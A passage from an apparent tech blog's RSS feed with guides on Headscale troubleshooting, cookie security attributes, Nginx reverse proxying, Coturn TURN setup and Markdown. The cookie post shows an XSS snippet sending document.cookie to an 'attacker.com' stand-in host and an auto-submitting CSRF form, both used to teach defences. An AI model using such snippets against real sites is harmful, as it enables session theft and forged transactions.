  mode: file
  path: /etc/headscale/acl.json
</code></pre>
<p>Restart Headscale:</p>
<pre><code class="language-bash">sudo systemctl restart headscale
</code></pre>
<h2>Troubleshooting</h2>
<h3>Connection Issues</h3>
<p>Check if the server is reachable:</p>
<pre><code class="language-bash">curl -I https://headscale.your-domain.com/health
</code></pre>
<h3>Certificate Errors</h3>
<p>Verify certificate validity:</p>
<pre><code class="language-bash">openssl s_client -connect headscale.your-domain.com:443 -servername headscale.your-domain.com
</code></pre>
<h3>Client Not Connecting</h3>
<p>Check client logs:</p>
<pre><code class="language-bash"># Linux
sudo journalctl -u tailscaled -f

# macOS
log stream --predicate &#39;subsystem == &quot;com.tailscale.ipn.macos&quot;&#39;
</code></pre>
<h3>DERP Connectivity</h3>
<p>Test if DERP is working:</p>
<pre><code class="language-bash"># On the server, check if STUN port is listening
sudo ss -tulpn | grep 3478
</code></pre>
<h3>View Server Logs</h3>
<pre><code class="language-bash">sudo journalctl -u headscale -f --no-pager
</code></pre>
<h2>Security Considerations</h2>
<ul>
<li>Keep Headscale updated to the latest version</li>
<li>Use strong, unique pre-auth keys</li>
<li>Set appropriate expiration times for pre-auth keys</li>
<li>Implement ACLs to restrict network access</li>
<li>Regularly audit connected nodes</li>
<li>Enable automatic certificate renewal</li>
<li>Consider running Headscale behind a reverse proxy for additional security</li>
</ul>
<h2>Conclusion</h2>
<p>Headscale provides a powerful self-hosted alternative to Tailscale&#39;s coordination server. With this setup, you have complete control over your mesh VPN infrastructure while still benefiting from Tailscale&#39;s excellent client software and WireGuard&#39;s security.</p>
<p>The combination of Headscale&#39;s simplicity and Tailscale&#39;s cross-platform clients makes it an excellent choice for homelab enthusiasts, small teams, or organizations that need to keep their network infrastructure fully self-hosted.</p>
<p>Remember to keep your server updated, monitor your logs, and regularly backup your configuration and database!</p>]]></content:encoded>
      <pubDate>Mon, 02 Feb 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>headscale</category>
      <category>tailscale</category>
      <category>vpn</category>
      <category>wireguard</category>
      <category>self-hosted</category>
      <category>networking</category>
      <category>mesh</category>
    </item>
<item>
      <title><![CDATA[HttpOnly, Secure, and SameSite Cookies Explained with Real Auth Example]]></title>
      <link>https://blog.niheshr.com/cookies-https</link>
      <guid isPermaLink="true">https://blog.niheshr.com/cookies-https</guid>
      <description><![CDATA[Deep dive into cookie security attributes with a practical authentication implementation example]]></description>
      <content:encoded><![CDATA[<p>Cookies are fundamental to web authentication, but improper configuration can expose your application to serious security vulnerabilities. This guide explains the three critical cookie security attributes—httpOnly, secure, and sameSite—with a real-world authentication example.</p>
<h2>Understanding Cookie Security Attributes</h2>
<p>Modern web applications face threats like Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). Cookie security attributes are your first line of defense against these attacks.</p>
<h3>The Three Essential Attributes</h3>
<ul>
<li><strong>httpOnly</strong>: Prevents JavaScript from accessing cookies</li>
<li><strong>secure</strong>: Ensures cookies are only sent over HTTPS</li>
<li><strong>sameSite</strong>: Controls when cookies are sent with cross-site requests</li>
</ul>
<h2>HttpOnly: Protecting Against XSS Attacks</h2>
<p>The httpOnly attribute prevents client-side JavaScript from accessing cookies through <code>document.cookie</code>. This is crucial for protecting sensitive tokens like session IDs.</p>
<h3>Without HttpOnly (Vulnerable)</h3>
<pre><code class="language-javascript">// Attacker&#39;s malicious script injected via XSS
const stolenToken = document.cookie;
fetch(&quot;https://attacker.com/steal&quot;, {
  method: &quot;POST&quot;,
  body: JSON.stringify({ token: stolenToken }),
});
</code></pre>
<p>If your authentication cookie lacks httpOnly, an attacker who successfully injects JavaScript can steal it immediately.</p>
<h3>With HttpOnly (Protected)</h3>
<pre><code class="language-javascript">// Server-side: Node.js/Express example
res.cookie(&quot;authToken&quot;, token, {
  httpOnly: true, // JavaScript cannot access this cookie
  maxAge: 24 * 60 * 60 * 1000, // 24 hours
});
</code></pre>
<p>Now even if an attacker injects malicious JavaScript, <code>document.cookie</code> won’t reveal the authentication token.</p>
<h2>Secure: HTTPS-Only Transmission</h2>
<p>The secure attribute ensures cookies are only transmitted over encrypted HTTPS connections, preventing man-in-the-middle attacks.</p>
<h3>The Risk Without Secure</h3>
<p>If a user connects over HTTP (even accidentally), cookies without the secure flag are transmitted in plain text. An attacker on the same network can intercept them.</p>
<h3>Implementation</h3>
<pre><code class="language-javascript">res.cookie(&quot;authToken&quot;, token, {
  httpOnly: true,
  secure: true, // Only sent over HTTPS
  maxAge: 24 * 60 * 60 * 1000,
});
</code></pre>
<p><strong>Important</strong>: In development, you might use HTTP. Handle this conditionally:</p>
<pre><code class="language-javascript">res.cookie(&quot;authToken&quot;, token, {
  httpOnly: true,
  secure: process.env.NODE_ENV === &quot;production&quot;,
  maxAge: 24 * 60 * 60 * 1000,
});
</code></pre>
<h2>SameSite: CSRF Protection</h2>
<p>The sameSite attribute controls whether cookies are sent with cross-site requests, protecting against CSRF attacks.</p>
<h3>SameSite Values</h3>
<ul>
<li><strong>Strict</strong>: Cookie is never sent on cross-site requests</li>
<li><strong>Lax</strong>: Cookie is sent only on top-level navigation with safe HTTP methods (GET)</li>
<li><strong>None</strong>: Cookie is always sent (requires secure attribute)</li>
</ul>
<h3>Understanding CSRF</h3>
<p>Imagine a user is logged into <code>yourbank.com</code>. They visit <code>evil.com</code>, which contains:</p>
<pre><code class="language-html">&lt;form action=&quot;https://yourbank.com/transfer&quot; method=&quot;POST&quot;&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;amount&quot; value=&quot;10000&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;to&quot; value=&quot;attacker-account&quot; /&gt;
&lt;/form&gt;
&lt;script&gt;
  document.forms[0].submit();
&lt;/script&gt;
</code></pre>
<p>Without sameSite protection, the browser automatically includes the authentication cookie with this malicious request.</p>
<h3>Protection with SameSite</h3>
<pre><code class="language-javascript">res.cookie(&quot;authToken&quot;, token, {
  httpOnly: true,
  secure: true,
  sameSite: &quot;strict&quot;, // Blocks cross-site requests entirely
  maxAge: 24 * 60 * 60 * 1000,
});
</code></pre>
<h3>Choosing the Right SameSite Value</h3>
<p><strong>Use Strict when</strong>: You want maximum security and your application doesn’t need cookies on cross-site navigation (like internal dashboards).</p>
<p><strong>Use Lax when</strong>: You need cookies on initial navigation from external sites (common for most web applications). This is the default in modern browsers.</p>
<p><strong>Use None when</strong>: You need cookies in cross-site contexts (like embedded iframes or third-party integrations). Must be combined with secure.</p>
<h2>Real-World Authentication Example</h2>
<p>Let’s build a complete authentication system with properly configured cookies.</p>
<h3>Backend: Express.js Authentication</h3>
<pre><code class="language-javascript">const express = require(&quot;express&quot;);
const jwt = require(&quot;jsonwebtoken&quot;);
const bcrypt = require(&quot;bcrypt&quot;);
const cookieParser = require(&quot;cookie-parser&quot;);

const app = express();
app.use(express.json());
app.use(cookieParser());

const JWT_SECRET = process.env.JWT_SECRET;
const REFRESH_SECRET = process.env.REFRESH_SECRET;

// Login endpoint
app.post(&quot;/api/auth/login&quot;, async (req, res) =&gt; {
  const { email, password } = req.body;

  // Validate credentials (simplified)
  const user = await User.findOne({ email });
  if (!user || !(await bcrypt.compare(password, user.passwordHash))) {
    return res.status(401).json({ error: &quot;Invalid credentials&quot; });
  }

  // Generate tokens
  const accessToken = jwt.sign(
    { userId: user.id, email: user.email },
    JWT_SECRET,
    { expiresIn: &quot;15m&quot; },
  );

  const refreshToken = jwt.sign({ userId: user.id }, REFRESH_SECRET, {
    expiresIn: &quot;7d&quot;,
  });

  // Set secure cookies
  res.cookie(&quot;accessToken&quot;, accessToken, {
    httpOnly: true,
    secure: process.env.NODE_ENV === &quot;production&quot;,
    sameSite: &quot;strict&quot;,
    maxAge: 15 * 60 * 1000, // 15 minutes
  });

  res.cookie(&quot;refreshToken&quot;, refreshToken, {
    httpOnly: true,
    secure: process.env.NODE_ENV === &quot;production&quot;,
    sameSite: &quot;strict&quot;,
    maxAge: 7 * 24 * 60 * 60 * 1000, // 7 days
  });

  res.json({
    success: true,
    user: { id: user.id, email: user.email },
  });
});

// Protected route middleware
const authenticate = (req, res, next) =&gt; {
  const token = req.cookies.accessToken;

  if (!token) {
    return res.status(401).json({ error: &quot;Not authenticated&quot; });
  }

  try {
    const decoded = jwt.verify(token, JWT_SECRET);
    req.user = decoded;
    next();
  } catch (error) {
    return res.status(401).json({ error: &quot;Invalid token&quot; });
  }
};

// Token refresh endpoint
app.post(&quot;/api/auth/refresh&quot;, async (req, res) =&gt; {
  const refreshToken = req.cookies.refreshToken;

  if (!refreshToken) {
    return res.status(401).json({ error: &quot;No refresh token&quot; });
  }

  try {
    const decoded = jwt.verify(refreshToken, REFRESH_SECRET);

    // Generate new access token
    const newAccessToken = jwt.sign({ userId: decoded.userId }, JWT_SECRET, {
      expiresIn: &quot;15m&quot;,
    });

    res.cookie(&quot;accessToken&quot;, newAccessToken, {
      httpOnly: true,
      secure: process.env.NODE_ENV === &quot;production&quot;,
      sameSite: &quot;strict&quot;,
      maxAge: 15 * 60 * 1000,
    });

    res.json({ success: true });
  } catch (error) {
    return res.status(401).json({ error: &quot;Invalid refresh token&quot; });
  }
});

// Logout endpoint
app.post(&quot;/api/auth/logout&quot;, (req, res) =&gt; {
  res.clearCookie(&quot;accessToken&quot;);
  res.clearCookie(&quot;refreshToken&quot;);
  res.json({ success: true });
});

// Protected route example
app.get(&quot;/api/user/profile&quot;, authenticate, (req, res) =&gt; {
  res.json({ user: req.user });
});

app.listen(3000, () =&gt; console.log(&quot;Server running on port 3000&quot;));
</code></pre>
<h3>Frontend: React Authentication</h3>
<pre><code class="language-javascript">import { useState } from &quot;react&quot;;

function LoginForm() {
  const [email, setEmail] = useState(&quot;&quot;);
  const [password, setPassword] = useState(&quot;&quot;);
  const [error, setError] = useState(&quot;&quot;);

  const handleLogin = async (e) =&gt; {
    e.preventDefault();

    try {
      const response = await fetch(&quot;http://localhost:3000/api/auth/login&quot;, {
        method: &quot;POST&quot;,
        headers: { &quot;Content-Type&quot;: &quot;application/json&quot; },
        credentials: &quot;include&quot;, // Important: sends cookies
        body: JSON.stringify({ email, password }),
      });

      if (!response.ok) {
        throw new Error(&quot;Login failed&quot;);
      }

      const data = await response.json();
      console.log(&quot;Logged in successfully:&quot;, data.user);
      // Redirect to dashboard
    } catch (err) {
      setError(err.message);
    }
  };

  return (
    &lt;form onSubmit={handleLogin}&gt;
      &lt;input
        type=&quot;email&quot;
        value={email}
        onChange={(e) =&gt; setEmail(e.target.value)}
        placeholder=&quot;Email&quot;
        required
      /&gt;
      &lt;input
        type=&quot;password&quot;
        value={password}
        onChange={(e) =&gt; setPassword(e.target.value)}
        placeholder=&quot;Password&quot;
        required
      /&gt;
      &lt;button type=&quot;submit&quot;&gt;Login&lt;/button&gt;
      {error &amp;&amp; &lt;p className=&quot;error&quot;&gt;{error}&lt;/p&gt;}
    &lt;/form&gt;
  );
}

// API utility with automatic token refresh
async function authenticatedFetch(url, options = {}) {
  const response = await fetch(url, {
    ...options,
    credentials: &quot;include&quot;,
  });

  if (response.status === 401) {
    // Try to refresh token
    const refreshResponse = await fetch(
      &quot;http://localhost:3000/api/auth/refresh&quot;,
      {
        method: &quot;POST&quot;,
        credentials: &quot;include&quot;,
      },
    );

    if (refreshResponse.ok) {
      // Retry original request
      return fetch(url, {
        ...options,
        credentials: &quot;include&quot;,
      });
    }

    // Refresh failed, redirect to login
    window.location.href = &quot;/login&quot;;
    throw new Error(&quot;Authentication failed&quot;);
  }

  return response;
}

// Usage example
function UserProfile() {
  const [profile, setProfile] = useState(null);

  useEffect(() =&gt; {
    authenticatedFetch(&quot;http://localhost:3000/api/user/profile&quot;)
      .then((res) =&gt; res.json())
      .then((data) =&gt; setProfile(data.user))
      .catch((err) =&gt; console.error(err));
  }, []);

  return profile ? &lt;div&gt;Welcome, {profile.email}&lt;/div&gt; : &lt;div&gt;Loading...&lt;/div&gt;;
}
</code></pre>
<h2>CORS Configuration for Cookie-Based Auth</h2>
<p>When using cookies with a separate frontend and backend, configure CORS properly:</p>
<pre><code class="language-javascript">const cors = require(&quot;cors&quot;);

app.use(
  cors({
    origin: &quot;http://localhost:5173&quot;, // Your frontend URL
    credentials: true, // Allow cookies
  }),
);
</code></pre>
<h2>Common Pitfalls and Solutions</h2>
<h3>Issue: Cookies Not Being Set</h3>
<p><strong>Problem</strong>: Frontend doesn’t receive cookies after login.</p>
<p><strong>Solution</strong>: Ensure you’re using <code>credentials: &#39;include&#39;</code> in fetch requests and have proper CORS configuration.</p>
<h3>Issue: Cookies Not Sent with Requests</h3>
<p><strong>Problem</strong>: Authenticated requests fail even after login.</p>
<p><strong>Solution</strong>: Always include <code>credentials: &#39;include&#39;</code> in fetch options and verify sameSite compatibility.</p>
<h3>Issue: SameSite Strict Blocking Legitimate Requests</h3>
<p><strong>Problem</strong>: Users redirected from external sites (like email links) lose authentication.</p>
<p><strong>Solution</strong>: Use <code>sameSite: &#39;lax&#39;</code> instead of strict, or implement a hybrid approach with different cookies for different purposes.</p>
<h2>Security Best Practices Checklist</h2>
<ul>
<li>Always use all three attributes together for authentication cookies</li>
<li>Keep access tokens short-lived (15 minutes or less)</li>
<li>Use refresh tokens for extended sessions</li>
<li>Implement token rotation on refresh</li>
<li>Clear cookies on logout</li>
<li>Use HTTPS in production (required for secure attribute)</li>
<li>Consider additional CSRF tokens for state-changing operations</li>
<li>Regularly rotate signing secrets</li>
<li>Monitor for suspicious authentication patterns</li>
<li>Implement rate limiting on authentication endpoints</li>
</ul>
<h2>Testing Cookie Security</h2>
<p>Test your cookie configuration using browser DevTools:</p>
<ol>
<li>Open DevTools (F12)</li>
<li>Navigate to Application tab</li>
<li>Find Cookies in the sidebar</li>
<li>Verify attributes are set correctly</li>
<li>Try accessing cookies via console with <code>document.cookie</code></li>
</ol>
<p>If httpOnly is properly configured, your authentication cookies won’t appear in the console output.</p>
<h2>Conclusion</h2>
<p>Cookie security attributes are not optional—they’re essential for protecting user sessions and preventing common web vulnerabilities. By combining httpOnly, secure, and sameSite attributes, you create multiple layers of defense against XSS and CSRF attacks.</p>
<p>Remember that cookie security is just one part of a comprehensive security strategy. Always validate input, sanitize output, use parameterized queries, keep dependencies updated, and follow security best practices throughout your application.</p>
<p>Implement these patterns consistently, and you’ll significantly reduce your application’s attack surface while providing a secure authentication experience for your users.​​​​​​​​​​​​​​​​</p>]]></content:encoded>
      <pubDate>Tue, 06 Jan 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>cookies</category>
      <category>security</category>
      <category>authentication</category>
      <category>web-security</category>
      <category>xss</category>
      <category>csrf</category>
    </item>
<item>
      <title><![CDATA[Setting Up Nginx with systemd Service Files on Linux]]></title>
      <link>https://blog.niheshr.com/nginx-configuration</link>
      <guid isPermaLink="true">https://blog.niheshr.com/nginx-configuration</guid>
      <description><![CDATA[A complete guide to installing Nginx, configuring reverse proxy, and managing it using systemd service files.]]></description>
      <content:encoded><![CDATA[<p>Nginx is a high-performance web server and reverse proxy widely used in production systems. This guide walks through <strong>installing Nginx</strong>, <strong>configuring it</strong>, and <strong>understanding its systemd service files</strong>.</p>
<h2>What is Nginx?</h2>
<p>Nginx is:</p>
<ul>
<li>A web server</li>
<li>A reverse proxy</li>
<li>A load balancer</li>
<li>An SSL termination layer</li>
</ul>
<p>It is commonly used to expose backend applications running on ports like <code>3000</code>, <code>4000</code>, etc.</p>
<h2>Prerequisites</h2>
<ul>
<li>Ubuntu / Debian based Linux</li>
<li>Root or sudo access</li>
<li>A running backend/frontend/DB service (Node.js, Next.js, API, etc.)</li>
<li>Optional: Domain name</li>
</ul>
<h2>Step 1: Install Nginx</h2>
<p>Update the system and install Nginx:</p>
<pre><code class="language-bash">sudo apt update
sudo apt install nginx -y
</code></pre>
<p>Check if it&#39;s running:</p>
<pre><code class="language-bash">sudo systemctl status nginx
</code></pre>
<p>Open your server IP in the browser — you should see the Nginx welcome page.</p>
<h2>Step 2: Understanding Nginx File Structure</h2>
<p>Important paths:</p>
<pre><code class="language-bash">/etc/nginx/
├── nginx.conf
├── sites-available/
├── sites-enabled/
├── conf.d/
└── modules-enabled/
</code></pre>
<ul>
<li><strong>sites-available</strong> → All virtual host configs</li>
<li><strong>sites-enabled</strong> → Active configs (symlinks)</li>
<li><strong>nginx.conf</strong> → Main configuration file</li>
</ul>
<h2>Step 3: Create a Reverse Proxy Config</h2>
<p>Create a new site config:</p>
<pre><code class="language-bash">sudo nano /etc/nginx/sites-available/myapp
</code></pre>
<p>Paste this configuration:</p>
<pre><code class="language-nginx">server {
    listen 80;
    server_name your-domain.com;

    location / {
        proxy_pass http://127.0.0.1:3000;
        proxy_http_version 1.1;

        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection &quot;upgrade&quot;;
        proxy_set_header Host $host;

        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}
</code></pre>
<p>Replace:</p>
<ul>
<li><code>your-domain.com</code> with your actual domain</li>
<li><code>3000</code> with your service port</li>
</ul>
<h2>Step 4: Enable the Site</h2>
<p>Create a symlink:</p>
<pre><code class="language-bash">sudo ln -s /etc/nginx/sites-available/myapp /etc/nginx/sites-enabled/
</code></pre>
<p>Test configuration:</p>
<pre><code class="language-bash">sudo nginx -t
</code></pre>
<p>Reload Nginx:</p>
<pre><code class="language-bash">sudo systemctl reload nginx
</code></pre>
<h2>Step 5: Common systemctl Commands</h2>
<pre><code class="language-bash">sudo systemctl start nginx
sudo systemctl stop nginx
sudo systemctl restart nginx
sudo systemctl reload nginx
sudo systemctl enable nginx
sudo systemctl disable nginx
</code></pre>
<p>Check logs:</p>
<pre><code class="language-bash">journalctl -u nginx -f
</code></pre>
<h2>Step 6: Custom Error Pages (Optional)</h2>
<p>Create an error page:</p>
<pre><code class="language-bash">sudo nano /var/www/html/50x.html
</code></pre>
<p>Example HTML content:</p>
<pre><code class="language-html">&lt;h1&gt;Service Temporarily Unavailable&lt;/h1&gt;
&lt;p&gt;Please try again later.&lt;/p&gt;
</code></pre>
<p>Add to your server block:</p>
<pre><code class="language-nginx">error_page 502 503 504 /50x.html;

location = /50x.html {
    root /var/www/html;
}
</code></pre>
<p>Reload Nginx:</p>
<pre><code class="language-bash">sudo systemctl reload nginx
</code></pre>
<h2>Step 7: Firewall Configuration</h2>
<pre><code class="language-bash">sudo ufw allow &#39;Nginx Full&#39;
sudo ufw reload
</code></pre>
<p><strong>Important:</strong> Be careful not to lose your SSH access when configuring firewall rules!</p>
<h2>Common Issues &amp; Fixes</h2>
<h3>Bad Gateway (502)</h3>
<p>Common causes:</p>
<ul>
<li>Backend service not running</li>
<li>Wrong port in <code>proxy_pass</code></li>
<li>App bound to localhost incorrectly</li>
</ul>
<h3>Config Not Loading</h3>
<p>Always test your configuration before reloading:</p>
<pre><code class="language-bash">sudo nginx -t
</code></pre>
<p>This will check for syntax errors in your Nginx configuration files.</p>
<h2>Conclusion</h2>
<p>Nginx is a powerful tool that transforms your application from a localhost project into a production-ready service. With reverse proxy configuration and systemd management, you can serve your apps securely, scale efficiently, and handle failures gracefully.</p>
<p>Whether you&#39;re deploying a Next.js app, a Node.js API, or any web service — mastering Nginx is essential for modern deployment workflows. Keep experimenting, monitor your logs, and your deployments will become second nature!</p>]]></content:encoded>
      <pubDate>Tue, 06 Jan 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>nginx</category>
      <category>linux</category>
      <category>systemd</category>
      <category>reverse-proxy</category>
      <category>deployment</category>
    </item>
<item>
      <title><![CDATA[Setting Up a TURN Server with Coturn]]></title>
      <link>https://blog.niheshr.com/turn-server-setup</link>
      <guid isPermaLink="true">https://blog.niheshr.com/turn-server-setup</guid>
      <description><![CDATA[Complete guide to setting up a TURN server using Coturn for WebRTC applications]]></description>
      <content:encoded><![CDATA[<p>TURN (Traversal Using Relays around NAT) servers are essential for WebRTC applications to work reliably across different network configurations. This guide will walk you through installing and configuring a TURN server using Coturn.</p>
<h2>What is TURN?</h2>
<p>TURN is a protocol that allows peers behind NATs or firewalls to communicate by relaying media through a server. It&#39;s often used alongside STUN servers for WebRTC applications.</p>
<h2>Prerequisites</h2>
<ul>
<li>Ubuntu/Debian server (or similar Linux distribution)</li>
<li>Root or sudo access</li>
<li>Domain name with SSL certificate (Can get one using Let&#39;s Encrypt)</li>
<li>Public IP address</li>
</ul>
<h2>Step 1: Install Coturn</h2>
<p>First, update your system and install Coturn:</p>
<pre><code class="language-bash">sudo apt update
sudo apt upgrade -y
sudo apt install coturn -y
</code></pre>
<h2>Step 2: Configure SSL Certificate</h2>
<p>Install Certbot for Let&#39;s Encrypt certificates:</p>
<pre><code class="language-bash">sudo apt install certbot -y
sudo certbot certonly --standalone -d your-domain.com
</code></pre>
<p>Replace <code>your-domain.com</code> with your actual domain name.</p>
<h3>Set Proper Permissions for SSL Certificates</h3>
<p>Coturn needs to read the SSL certificates, so set the correct ownership:</p>
<pre><code class="language-bash">sudo chown turnserver:turnserver /etc/letsencrypt/live/your-domain.com/
sudo chown turnserver:turnserver /etc/letsencrypt/live/your-domain.com/*
sudo chmod 644 /etc/letsencrypt/live/your-domain.com/*.pem
</code></pre>
<h2>Step 3: Configure Coturn</h2>
<p>Create the configuration file:</p>
<pre><code class="language-bash">sudo nano /etc/turnserver.conf
</code></pre>
<p>Add the following configuration (replace with your actual values):</p>
<pre><code class="language-bash"># === REALM &amp; AUTH ===
realm=your-domain.com
server-name=turn-server
lt-cred-mech
fingerprint

# === LISTENING CONFIGURATION ===
listening-port=3478
tls-listening-port=5349
listening-ip=0.0.0.0

# === CRITICAL FIX: RELAY &amp; EXTERNAL IPs ===
relay-ip=YOUR_PRIVATE_IP
external-ip=YOUR_PUBLIC_IP/YOUR_PRIVATE_IP

# === CREDENTIALS ===
user=turnuser:securepassword123

# === CERTIFICATES ===
cert=/etc/letsencrypt/live/your-domain.com/fullchain.pem
pkey=/etc/letsencrypt/live/your-domain.com/privkey.pem

# === PORT RANGE ===
min-port=49152
max-port=65535

# === LOGGING ===
log-file=/var/log/turnserver/turn.log
verbose

# === SECURITY &amp; BEHAVIOR ===
no-rfc5780
no-stun-backward-compatibility
response-origin-only-with-rfc5780
syslog
no-multicast-peers

# === CLI PASSWORD (IF REQUIRED) ===
cli-password=your-password

# === ALLOCATION TIMEOUT ===
stale-nonce=3600
bps-capacity=0

max-bps=3000000
user-quota=0
total-quota=0
</code></pre>
<h3>Key Configuration Options Explained:</h3>
<ul>
<li><strong>realm</strong>: Your domain name</li>
<li><strong>relay-ip</strong>: Your server&#39;s private IP address</li>
<li><strong>external-ip</strong>: Public IP followed by private IP (separated by slash)</li>
<li><strong>user</strong>: Username and password for TURN authentication</li>
<li><strong>cert/pkey</strong>: Paths to your SSL certificates</li>
</ul>
<h2>Step 4: Set Up Logging Directory</h2>
<p>Create the log directory and set permissions:</p>
<pre><code class="language-bash">sudo mkdir -p /var/log/turnserver
sudo chown turnserver:turnserver /var/log/turnserver
</code></pre>
<h2>Step 5: Configure Firewall</h2>
<p>Allow the necessary ports through your firewall:</p>
<pre><code class="language-bash">sudo ufw allow 3478/tcp
sudo ufw allow 3478/udp
sudo ufw allow 5349/tcp
sudo ufw allow 5349/udp
sudo ufw allow 49152:65535/udp
</code></pre>
<h3>Cloud Provider Security Rules</h3>
<p>If deploying on a cloud provider (AWS, Azure, etc.), configure your security groups or network security groups to allow inbound traffic on the following ports (adjust source IPs as needed for security):</p>
<ul>
<li><strong>TCP and UDP:</strong> 3478</li>
<li><strong>TCP and UDP:</strong> 5349</li>
<li><strong>UDP:</strong> 49152-65535</li>
</ul>
<p>Outbound rules should allow all traffic, which is the default in most cloud providers and sufficient for TURN server operation.</p>
<h2>Step 6: Start and Enable Coturn Service</h2>
<pre><code class="language-bash">sudo systemctl enable coturn
sudo systemctl start coturn
sudo systemctl status coturn
</code></pre>
<h2>Step 7: Test Your TURN Server</h2>
<p>You can test your TURN server using tools like <a href="https://webrtc.github.io/samples/src/content/peerconnection/trickle-ice/">Trickle ICE</a> or command-line tools.</p>
<h3>Using turnutils</h3>
<pre><code class="language-bash">sudo apt install turnutils -y
turnutils_uclient -t -u turnuser -w securepassword123 your-domain.com
</code></pre>
<h2>Troubleshooting</h2>
<h3>Common Issues:</h3>
<ol>
<li><strong>Port binding errors</strong>: Check if ports are already in use</li>
<li><strong>Certificate errors</strong>: Ensure certificate paths are correct</li>
<li><strong>Connection failures</strong>: Verify firewall rules and IP configurations</li>
</ol>
<h3>Check logs:</h3>
<pre><code class="language-bash">sudo tail -f /var/log/turnserver/turn.log
</code></pre>
<h2>Security Considerations</h2>
<ul>
<li>Use strong passwords for TURN credentials</li>
<li>Keep SSL certificates up to date</li>
<li>Monitor server logs for suspicious activity</li>
<li>Consider using a dedicated user for TURN operations</li>
</ul>
<h2>Usage in WebRTC Applications</h2>
<p>In your WebRTC application, configure the ICE servers like this:</p>
<pre><code class="language-javascript">const iceServers = [
  {
    urls: &quot;stun:stun.l.google.com:19302&quot;,
  },
  {
    urls: &quot;turn:your-domain.com:5349&quot;,
    username: &quot;turnuser&quot;,
    credential: &quot;securepassword123&quot;,
  },
];

const peerConnection = new RTCPeerConnection({ iceServers });
</code></pre>
<h2>Conclusion</h2>
<p>Setting up a TURN server ensures your WebRTC applications work reliably across all network configurations. Coturn is a robust, open-source solution that handles the complexities of NAT traversal for you.</p>
<p>Remember to replace all placeholder values with your actual domain, IPs, and secure passwords before deploying to production!</p>]]></content:encoded>
      <pubDate>Mon, 05 Jan 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>turn-server</category>
      <category>webrtc</category>
      <category>coturn</category>
      <category>stun</category>
      <category>nat-traversal</category>
    </item>
<item>
      <title><![CDATA[Markdown Syntax Guide]]></title>
      <link>https://blog.niheshr.com/markdown-syntax-guide</link>
      <guid isPermaLink="true">https://blog.niheshr.com/markdown-syntax-guide</guid>
      <description><![CDATA[A comprehensive guide to Markdown syntax with examples.]]></description>
      <content:encoded><![CDATA[<p>This post demonstrates various <strong>Markdown</strong> features.</p>
<h2>Text Formatting</h2>
<h3>How to Write</h3>
<pre><code class="language-markdown">- **Bold text** using double asterisks
- _Italic text_ using underscores
- **_Bold and italic_** combining bold and italic
- ~~Strikethrough~~ using double tildes
</code></pre>
<h3>Result</h3>
<ul>
<li><strong>Bold text</strong> using double asterisks</li>
<li><em>Italic text</em> using underscores</li>
<li><strong><em>Bold and italic</em></strong> combining bold and italic</li>
<li><del>Strikethrough</del> using double tildes</li>
</ul>
<h2>Lists</h2>
<h3>Unordered Lists</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">- Item 1
- Item 2
  - Nested item 2.1
  - Nested item 2.2
- Item 3
</code></pre>
<h4>Result</h4>
<ul>
<li>Item 1</li>
<li>Item 2<ul>
<li>Nested item 2.1</li>
<li>Nested item 2.2</li>
</ul>
</li>
<li>Item 3</li>
</ul>
<h3>Ordered Lists</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">1. First item
2. Second item
3. Third item
</code></pre>
<h4>Result</h4>
<ol>
<li>First item</li>
<li>Second item</li>
<li>Third item</li>
</ol>
<h2>Code Blocks</h2>
<h3>Inline Code</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">Use `console.log()` for debugging.
</code></pre>
<h4>Result</h4>
<p>Use <code>console.log()</code> for debugging.</p>
<h3>JavaScript</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">```javascript
const greeting = &quot;Hello, World!&quot;;
console.log(greeting);
```
</code></pre>
<h4>Result</h4>
<pre><code class="language-javascript">const greeting = &quot;Hello, World!&quot;;
console.log(greeting);
</code></pre>
<h3>Python</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">```python
def hello_world():
    print(&quot;Hello, World!&quot;)
```
</code></pre>
<h4>Result</h4>
<pre><code class="language-python">def hello_world():
    print(&quot;Hello, World!&quot;)
</code></pre>
<h3>Bash</h3>
<h4>How to Write</h4>
<pre><code class="language-markdown">```bash
echo &quot;Hello, World!&quot;
ls -la
cd /home/user
```
</code></pre>
<h4>Result</h4>
<pre><code class="language-bash">echo &quot;Hello, World!&quot;
ls -la
cd /home/user
</code></pre>
<h2>Quotes</h2>
<h3>How to Write</h3>
<pre><code class="language-markdown">&gt; This is a blockquote.
&gt; It can span multiple lines.
</code></pre>
<h3>Result</h3>
<blockquote>
<p>This is a blockquote.
It can span multiple lines.</p>
</blockquote>
<h2>Links</h2>
<h3>How to Write</h3>
<pre><code class="language-markdown">[Visit Next.js](https://nextjs.org)
</code></pre>
<h3>Result</h3>
<p><a href="https://nextjs.org">Visit Next.js</a></p>
<h2>Summary</h2>
<p>Markdown is a <em>simple</em> yet <strong>powerful</strong> markup language!</p>]]></content:encoded>
      <pubDate>Sat, 03 Jan 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>markdown</category>
      <category>guide</category>
      <category>formatting</category>
    </item>
<item>
      <title><![CDATA[Welcome to My Blog]]></title>
      <link>https://blog.niheshr.com/welcome-to-my-blog</link>
      <guid isPermaLink="true">https://blog.niheshr.com/welcome-to-my-blog</guid>
      <description><![CDATA[This is the first post on my new blog. Welcome!]]></description>
      <content:encoded><![CDATA[<p>Welcome to my <strong>first blog post</strong> 👋</p>
<p>This blog is a space where I’ll share my thoughts, experiences, and things I learn along the way while working with technology.</p>
<h2>What You’ll Find Here</h2>
<ul>
<li>Technical writing on web development and software engineering</li>
<li>Personal perspectives on technology and learning</li>
